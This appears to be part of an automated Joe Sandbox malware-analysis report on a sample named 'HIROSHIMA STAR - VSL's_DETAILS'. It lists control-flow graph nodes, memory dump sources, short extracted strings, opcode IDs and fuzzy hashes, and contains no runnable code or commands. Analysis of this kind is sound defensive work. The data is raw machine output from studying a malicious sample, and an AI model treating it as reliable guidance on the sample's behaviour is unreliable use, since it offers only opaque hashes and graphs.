                                                                                                                                                                      control_flow_graph 2378 2feca08-2feca0a 2379 2feca0c-2feca0e 2378->2379 2380 2feca11 2378->2380 2381 2feca15-2feca38 2379->2381 2382 2feca10 2379->2382 2380->2381 2383 2feca3f-2fecb1c call 2fe41a0 call 2fe3cc0 2381->2383 2384 2feca3a 2381->2384 2382->2380 2394 2fecb1e 2383->2394 2395 2fecb23-2fecb44 call 2fe5658 2383->2395 2384->2383 2394->2395 2397 2fecb49-2fecb54 2395->2397 2398 2fecb5b-2fecb5f 2397->2398 2399 2fecb56 2397->2399 2400 2fecb64-2fecb6b 2398->2400 2401 2fecb61-2fecb62 2398->2401 2399->2398 2403 2fecb6d 2400->2403 2404 2fecb72-2fecb80 2400->2404 2402 2fecb83-2fecbc7 2401->2402 2408 2fecc2d-2fecc44 2402->2408 2403->2404 2404->2402 2410 2fecbc9-2fecbdf 2408->2410 2411 2fecc46-2fecc6b 2408->2411 2415 2fecc09 2410->2415 2416 2fecbe1-2fecbed 2410->2416 2417 2fecc6d-2fecc82 2411->2417 2418 2fecc83 2411->2418 2421 2fecc0f-2fecc2c 2415->2421 2419 2fecbef-2fecbf5 2416->2419 2420 2fecbf7-2fecbfd 2416->2420 2417->2418 2422 2fecc07 2419->2422 2420->2422 2421->2408 2422->2421
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: 4825ab84ec4c48a83f18723b63cd766ac0291753322f4cbe620a2d053d994064
                                                                                                                                                                      • Instruction ID: b745ab13e0a367c25bfe9aa0e855093af70ebf20e39ba001d48b27d572829bf2
                                                                                                                                                                      • Opcode Fuzzy Hash: 4825ab84ec4c48a83f18723b63cd766ac0291753322f4cbe620a2d053d994064
                                                                                                                                                                      • Instruction Fuzzy Hash: EC81C574E00258CFDB15DFAAD994A9DBBF2BF88300F14D06AE519AB365DB309981CF50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2426 2fec738-2fec768 2427 2fec76f-2fec84c call 2fe41a0 call 2fe3cc0 2426->2427 2428 2fec76a 2426->2428 2438 2fec84e 2427->2438 2439 2fec853-2fec874 call 2fe5658 2427->2439 2428->2427 2438->2439 2441 2fec879-2fec884 2439->2441 2442 2fec88b-2fec88f 2441->2442 2443 2fec886 2441->2443 2444 2fec894-2fec89b 2442->2444 2445 2fec891-2fec892 2442->2445 2443->2442 2447 2fec89d 2444->2447 2448 2fec8a2-2fec8b0 2444->2448 2446 2fec8b3-2fec8f7 2445->2446 2452 2fec95d-2fec974 2446->2452 2447->2448 2448->2446 2454 2fec8f9-2fec90f 2452->2454 2455 2fec976-2fec99b 2452->2455 2459 2fec939 2454->2459 2460 2fec911-2fec91d 2454->2460 2464 2fec99d-2fec9b2 2455->2464 2465 2fec9b3 2455->2465 2463 2fec93f-2fec95c 2459->2463 2461 2fec91f-2fec925 2460->2461 2462 2fec927-2fec92d 2460->2462 2466 2fec937 2461->2466 2462->2466 2463->2452 2464->2465 2466->2463
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: b66311aebb6cd94842918648b1ca77ed13e333380b59ea7ba1c5129633fb1f7c
                                                                                                                                                                      • Instruction ID: 636764053a3e84fc10cee20d797c68f69a9bbde574ee11f618496347367cbf39
                                                                                                                                                                      • Opcode Fuzzy Hash: b66311aebb6cd94842918648b1ca77ed13e333380b59ea7ba1c5129633fb1f7c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D81D374E00218CFDB15DFAAD994A9DBBF2BF88300F14D06AE519AB365DB309985CF50
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: 31ba16223e5ad62a7cf5194652949ab55ea1646d7b9e2313374bb75dd8c691e5
                                                                                                                                                                      • Instruction ID: b721ce6ba91ba0c5f1bdc90bbe04c43a6ae1d468de296eed29e55bd5279c4f91
                                                                                                                                                                      • Opcode Fuzzy Hash: 31ba16223e5ad62a7cf5194652949ab55ea1646d7b9e2313374bb75dd8c691e5
                                                                                                                                                                      • Instruction Fuzzy Hash: BC81B374E00218CFDB15DFAAD984A9DBBF2BF89300F14D06AE509AB365DB349981CF14
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                      • Opcode ID: d0267f1e7c1d3469cbddd477b369fd07aa20dcd67c08b817283adc7d20e275d6
                                                                                                                                                                      • Instruction ID: 0bca6f8239577e850acd16c063d7b41b615434be04149638c7ea6cd51ea3ad1a
                                                                                                                                                                      • Opcode Fuzzy Hash: d0267f1e7c1d3469cbddd477b369fd07aa20dcd67c08b817283adc7d20e275d6
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A81B774E01218CFEB15DFAAD984A9DBBF2BF88300F14D069E519AB365DB349985CF10
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9dbc4da6844b94c757aa560fc983a8282e968d81b5a3ca5725fbe80f79b2d50a
                                                                                                                                                                      • Instruction ID: 9f2728b5572ec362cb8a54d54fdd409b7b582da5d0fdd1ed3656c60c3ad88b06
                                                                                                                                                                      • Opcode Fuzzy Hash: 9dbc4da6844b94c757aa560fc983a8282e968d81b5a3ca5725fbe80f79b2d50a
                                                                                                                                                                      • Instruction Fuzzy Hash: 50F1D174E01218CFDB54DFA9D884B9DBBB2BF88304F54C1A9E808AB355DB74A985CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 75a023d052fa50d5e2126c4405bde9b61ebfe3ce03594856541f49d59e435672
                                                                                                                                                                      • Instruction ID: 45c02b3a60d779c705979e3fb2155861a78cfff19d494adcc27c90a1a0b37aa8
                                                                                                                                                                      • Opcode Fuzzy Hash: 75a023d052fa50d5e2126c4405bde9b61ebfe3ce03594856541f49d59e435672
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D72CD75E052288FDB65DFA9C984BD9BBB2BB49300F1091E9E409A7361DB349EC1CF40
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7eda5d9fb63583fc5a4e553df3248a3c16c210430a515f42f321b5f2cecdf09a
                                                                                                                                                                      • Instruction ID: a46a9e189b2686ea28a29ce87257abf9be8835cdb1216c0d71e7e0d3036ce7c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 7eda5d9fb63583fc5a4e553df3248a3c16c210430a515f42f321b5f2cecdf09a
                                                                                                                                                                      • Instruction Fuzzy Hash: 08C19E78E01219CFDB54DFA5C994B9DBBB2BF89300F1081A9D809AB364DB359E85CF50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d48c10f6b9a2064f8c57971885d596a3e5f4f194caee15c387fb3dc91d308c1e
                                                                                                                                                                      • Instruction ID: c281dd92408c331ab9363e15d42057d401fd32231ab2dca2ba530d4e39e79705
                                                                                                                                                                      • Opcode Fuzzy Hash: d48c10f6b9a2064f8c57971885d596a3e5f4f194caee15c387fb3dc91d308c1e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3EA11570D00209CFDB54DFA9C994B9DBBB2FF89304F209269E419AB3A1DB709985CF54
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0f16c6c62c70cc1ae0ec65a3b8dc47c4d039955ac1b2882e53c75b5c0c575935
                                                                                                                                                                      • Instruction ID: 3e73c6f467e2744296e2a06e0d266966198d5e73a2b362360cb6ead9d3b26bdd
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f16c6c62c70cc1ae0ec65a3b8dc47c4d039955ac1b2882e53c75b5c0c575935
                                                                                                                                                                      • Instruction Fuzzy Hash: 3CA1F570D00209CFDB54DFA8C994B9DBBB2BF89304F209269E419AB3A1DB749985CF54
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4171894391.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f80000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8e862ccd0b5ca8b2ea93a996b5e5946b281b79e51e80da51bb2850f3494b02a9
                                                                                                                                                                      • Instruction ID: 6bda45788df550e878417e71e07cd771638b5f6506919c82439859a5fd34852a
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e862ccd0b5ca8b2ea93a996b5e5946b281b79e51e80da51bb2850f3494b02a9
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A91F570D00209CFEB50DFA8C894B9CBBB2FF49314F2092A9E519AB391DB749985CF54
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a4a406a200dc7090af3e44989115772a0041073d105b0b325477fcb32c01a884
                                                                                                                                                                      • Instruction ID: 129ba073f4804661bd58e9dead6d93a605f565f8d7b7524c8650a714195164ea
                                                                                                                                                                      • Opcode Fuzzy Hash: a4a406a200dc7090af3e44989115772a0041073d105b0b325477fcb32c01a884
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F51A574E00208DFDB19DFAAD984A9DBBB2BF88310F208429E815AB364DB319945CF15
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7b11c83ce0bf43e136b835bba06e4d2ab20608ecf2a55d2970b748f8964f0548
                                                                                                                                                                      • Instruction ID: 4795ee2adf478d3b769d4c37807d3ca1f84a725adf72b52efbde402c2518ca7a
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b11c83ce0bf43e136b835bba06e4d2ab20608ecf2a55d2970b748f8964f0548
                                                                                                                                                                      • Instruction Fuzzy Hash: DB51B774E00208DFDB19DFAAD994A9DBBB2FF88310F14D429E815AB364DB319845CF15

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 2fe76f1-2fe76f2 1 2fe76f9-2fe76fa 0->1 2 2fe76f4-2fe76f8 0->2 3 2fe76fc-2fe76fd 1->3 4 2fe7701-2fe7725 1->4 2->1 3->4 5 2fe772b-2fe774e 4->5 6 2fe7b54-2fe7b58 4->6 15 2fe77fc-2fe7800 5->15 16 2fe7754-2fe7761 5->16 7 2fe7b5a-2fe7b6e 6->7 8 2fe7b71-2fe7b7f 6->8 12 2fe7bf0-2fe7c05 8->12 13 2fe7b81-2fe7b96 8->13 22 2fe7c0c-2fe7c19 12->22 23 2fe7c07-2fe7c0a 12->23 24 2fe7b9d-2fe7baa 13->24 25 2fe7b98-2fe7b9b 13->25 19 2fe7848-2fe7851 15->19 20 2fe7802-2fe7810 15->20 28 2fe7763-2fe776e 16->28 29 2fe7770 16->29 26 2fe7c67 19->26 27 2fe7857-2fe7861 19->27 20->19 40 2fe7812-2fe782d 20->40 30 2fe7c1b-2fe7c56 22->30 23->30 31 2fe7bac-2fe7bed 24->31 25->31 34 2fe7c6c-2fe7c7a 26->34 27->6 32 2fe7867-2fe7870 27->32 35 2fe7772-2fe7774 28->35 29->35 82 2fe7c5d-2fe7c64 30->82 38 2fe787f-2fe788b 32->38 39 2fe7872-2fe7877 32->39 50 2fe7c7c-2fe7c80 34->50 51 2fe7c81-2fe7c82 34->51 35->15 42 2fe777a-2fe77dc 35->42 38->34 45 2fe7891-2fe7897 38->45 39->38 62 2fe782f-2fe7839 40->62 63 2fe783b 40->63 94 2fe77de 42->94 95 2fe77e2-2fe77f9 42->95 47 2fe7b3e-2fe7b42 45->47 48 2fe789d-2fe78ad 45->48 47->26 53 2fe7b48-2fe7b4e 47->53 60 2fe78af-2fe78bf 48->60 61 2fe78c1-2fe78c3 48->61 50->51 58 2fe7c89-2fe7c9c 51->58 59 2fe7c83-2fe7c85 51->59 53->6 53->32 77 2fe7c9e-2fe7cb4 58->77 78 2fe7cb5-2fe7cbc 58->78 67 2fe78c6-2fe78cc 60->67 61->67 68 2fe783d-2fe783f 62->68 63->68 67->47 74 2fe78d2-2fe78e1 67->74 68->19 75 2fe7841 68->75 79 2fe798f-2fe79ba call 2fe7538 * 2 74->79 80 2fe78e7 74->80 75->19 98 2fe7aa4-2fe7abe 79->98 99 2fe79c0-2fe79c4 79->99 84 2fe78ea-2fe78fb 80->84 84->34 87 2fe7901-2fe7913 84->87 87->34 90 2fe7919-2fe7931 87->90 152 2fe7933 call 2fe80d8 90->152 153 2fe7933 call 2fe80c9 90->153 93 2fe7939-2fe7949 93->47 97 2fe794f-2fe7952 93->97 94->95 95->15 100 2fe795c-2fe795f 97->100 101 2fe7954-2fe795a 97->101 98->6 119 2fe7ac4-2fe7ac8 98->119 99->47 104 2fe79ca-2fe79ce 99->104 100->26 102 2fe7965-2fe7968 100->102 101->100 101->102 105 2fe796a-2fe796e 102->105 106 2fe7970-2fe7973 102->106 108 2fe79f6-2fe79fc 104->108 109 2fe79d0-2fe79dd 104->109 105->106 110 2fe7979-2fe797d 105->110 106->26 106->110 111 2fe79fe-2fe7a02 108->111 112 2fe7a37-2fe7a3d 108->112 120 2fe79df-2fe79ea 109->120 121 2fe79ec 109->121 110->26 114 2fe7983-2fe7989 110->114 111->112 115 2fe7a04-2fe7a0d 111->115 116 2fe7a3f-2fe7a43 112->116 117 2fe7a49-2fe7a4f 112->117 114->79 114->84 124 2fe7a0f-2fe7a14 115->124 125 2fe7a1c-2fe7a32 115->125 116->82 116->117 122 2fe7a5b-2fe7a5d 117->122 123 2fe7a51-2fe7a55 117->123 126 2fe7aca-2fe7ad4 call 2fe63e0 119->126 127 2fe7b04-2fe7b08 119->127 130 2fe79ee-2fe79f0 120->130 121->130 128 2fe7a5f-2fe7a68 122->128 129 2fe7a92-2fe7a94 122->129 123->47 123->122 124->125 125->47 126->127 140 2fe7ad6-2fe7aeb 126->140 127->82 137 2fe7b0e-2fe7b12 127->137 133 2fe7a6a-2fe7a6f 128->133 134 2fe7a77-2fe7a8d 128->134 129->47 135 2fe7a9a-2fe7aa1 129->135 130->47 130->108 133->134 134->47 137->82 138 2fe7b18-2fe7b25 137->138 143 2fe7b27-2fe7b32 138->143 144 2fe7b34 138->144 140->127 149 2fe7aed-2fe7b02 140->149 146 2fe7b36-2fe7b38 143->146 144->146 146->47 146->82 149->6 149->127 152->93 153->93
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                      • API String ID: 0-1932283790
                                                                                                                                                                      • Opcode ID: 4760d34dfbe18380e8366eade1936df61c64f1d791d1d537f4a83a3e21b5c39c
                                                                                                                                                                      • Instruction ID: a7d7a86f2227fc2811d73957066ee7bffb76eb6cf3209ba1156d0adc4a82409d
                                                                                                                                                                      • Opcode Fuzzy Hash: 4760d34dfbe18380e8366eade1936df61c64f1d791d1d537f4a83a3e21b5c39c
                                                                                                                                                                      • Instruction Fuzzy Hash: FF124730A002099FCF16EF68D984AAEBBF2EF48354F148599E956DB365D730ED41CB50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 2105 2fe6498-2fe64a5 2106 2fe64ad-2fe64af 2105->2106 2107 2fe64a7-2fe64ab 2105->2107 2109 2fe66c0-2fe66c7 2106->2109 2107->2106 2108 2fe64b4-2fe64bf 2107->2108 2110 2fe66c8 2108->2110 2111 2fe64c5-2fe64cc 2108->2111 2114 2fe66cd-2fe66d9 2110->2114 2112 2fe64d2-2fe64e1 2111->2112 2113 2fe6661-2fe6667 2111->2113 2112->2114 2115 2fe64e7-2fe64f6 2112->2115 2116 2fe666d-2fe6671 2113->2116 2117 2fe6669-2fe666b 2113->2117 2124 2fe66dc-2fe66e0 2114->2124 2125 2fe66e1 2114->2125 2126 2fe650b-2fe650e 2115->2126 2127 2fe64f8-2fe64fb 2115->2127 2118 2fe66be 2116->2118 2119 2fe6673-2fe6679 2116->2119 2117->2109 2118->2109 2119->2110 2122 2fe667b-2fe667e 2119->2122 2122->2110 2123 2fe6680-2fe6695 2122->2123 2147 2fe66b9-2fe66bc 2123->2147 2148 2fe6697-2fe669d 2123->2148 2124->2125 2130 2fe6718-2fe671a 2124->2130 2131 2fe66e9-2fe6705 2125->2131 2132 2fe66e2 2125->2132 2128 2fe651a-2fe6520 2126->2128 2129 2fe6510-2fe6513 2126->2129 2127->2128 2133 2fe64fd-2fe6500 2127->2133 2137 2fe6538-2fe6555 2128->2137 2138 2fe6522-2fe6528 2128->2138 2135 2fe6566-2fe656c 2129->2135 2136 2fe6515 2129->2136 2140 2fe672f-2fe6736 2130->2140 2141 2fe671c-2fe672e 2130->2141 2158 2fe670e-2fe6712 2131->2158 2159 2fe6707-2fe670c 2131->2159 2132->2131 2139 2fe66e4-2fe66e5 2132->2139 2142 2fe6506 2133->2142 2143 2fe6601-2fe6607 2133->2143 2145 2fe656e-2fe6574 2135->2145 2146 2fe6584-2fe6596 2135->2146 2144 2fe662c-2fe6639 2136->2144 2183 2fe655e-2fe6561 2137->2183 2149 2fe652c-2fe6536 2138->2149 2150 2fe652a 2138->2150 2139->2131 2142->2144 2152 2fe661f-2fe6629 2143->2152 2153 2fe6609-2fe660f 2143->2153 2170 2fe664d-2fe664f 2144->2170 2171 2fe663b-2fe663f 2144->2171 2154 2fe6578-2fe6582 2145->2154 2155 2fe6576 2145->2155 2173 2fe6598-2fe65a4 2146->2173 2174 2fe65a6-2fe65c9 2146->2174 2147->2109 2156 2fe66af-2fe66b2 2148->2156 2157 2fe669f-2fe66ad 2148->2157 2149->2137 2150->2137 2152->2144 2161 2fe6613-2fe661d 2153->2161 2162 2fe6611 2153->2162 2154->2146 2155->2146 2156->2110 2167 2fe66b4-2fe66b7 2156->2167 2157->2110 2157->2156 2158->2130 2159->2130 2161->2152 2162->2152 2167->2147 2167->2148 2178 2fe6653-2fe6656 2170->2178 2171->2170 2177 2fe6641-2fe6645 2171->2177 2184 2fe65f1-2fe65ff 2173->2184 2174->2110 2186 2fe65cf-2fe65d2 2174->2186 2177->2110 2179 2fe664b 2177->2179 2178->2110 2180 2fe6658-2fe665b 2178->2180 2179->2178 2180->2112 2180->2113 2183->2144 2184->2144 2186->2110 2188 2fe65d8-2fe65ea 2186->2188 2188->2184
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ,bq$,bq
                                                                                                                                                                      • API String ID: 0-2699258169
                                                                                                                                                                      • Opcode ID: 2fb2efc3baa818e8a0803d260f9bb93e60842ad109837d2e3dddb7bc743349eb
                                                                                                                                                                      • Instruction ID: f6231bee668cb1246f82c120d9a10e94d552824fd1af5af8ddf90ef9146d8720
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fb2efc3baa818e8a0803d260f9bb93e60842ad109837d2e3dddb7bc743349eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E81D170F10609CFCF16CF68C88496ABBBABF99394B158169D606DB364DB31E841CF51
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Hbq$Hbq
                                                                                                                                                                      • API String ID: 0-4258043069
                                                                                                                                                                      • Opcode ID: c1b2e22abb0bd83fa206c0c7853d5c7a659ad228e122ecf250532b9bf7b7a172
                                                                                                                                                                      • Instruction ID: cd38f2ce2d76459701aa4172b94b66b98ac99a98d10f6fb1cd374e9428bb43ed
                                                                                                                                                                      • Opcode Fuzzy Hash: c1b2e22abb0bd83fa206c0c7853d5c7a659ad228e122ecf250532b9bf7b7a172
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A51BF31B042698FDF169F24D85476B7BEAFF98784F044529EA02CB281CB79C801DB91
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q$4'^q
                                                                                                                                                                      • API String ID: 0-2697143702
                                                                                                                                                                      • Opcode ID: 20483af1f0745b1c80358268a788c9941c77dcc2c2dca9f7db1fa3a0f2563a5e
                                                                                                                                                                      • Instruction ID: 136eb194faebae1608cdaac47af1ece447a77216a987b9ddcf478204c24c5bd8
                                                                                                                                                                      • Opcode Fuzzy Hash: 20483af1f0745b1c80358268a788c9941c77dcc2c2dca9f7db1fa3a0f2563a5e
                                                                                                                                                                      • Instruction Fuzzy Hash: F151E4307002149FDF12DF69C840B6EBBE6EF88350F04846AEA4ACB255DBB5DC41CB61
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$Xbq
                                                                                                                                                                      • API String ID: 0-1243427068
                                                                                                                                                                      • Opcode ID: 2118603fda2520366285a278c84f3b56a004461c6babb1bb93234c6b9a1837af
                                                                                                                                                                      • Instruction ID: 81d2f6b6a33a75b4765413f8b2f74a63c493dedc61bc35578085f5756f4f0c1d
                                                                                                                                                                      • Opcode Fuzzy Hash: 2118603fda2520366285a278c84f3b56a004461c6babb1bb93234c6b9a1837af
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C314D31B043188BDF3A467A899837EAAE6ABC4280F1444BDE907C3394DB75CC44C751
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.4163533474.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FE0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_2fe0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $^q$$^q
                                                                                                                                                                      • API String ID: 0-355816377
                                                                                                                                                                      • Opcode ID: 222f79ac070823931ea7556f4a14b01cf9030cede721d524b80773bd02989a71
                                                                                                                                                                      • Instruction ID: c903e027292e130b0d5fa287d7ccbbdc20ef0f250720807b61fa19ab5f300f67
                                                                                                                                                                      • Opcode Fuzzy Hash: 222f79ac070823931ea7556f4a14b01cf9030cede721d524b80773bd02989a71
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B31A6317042818FCF27AB79D85463E7B67AB846D0714446AF117DB2B2EB28CC81C757
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
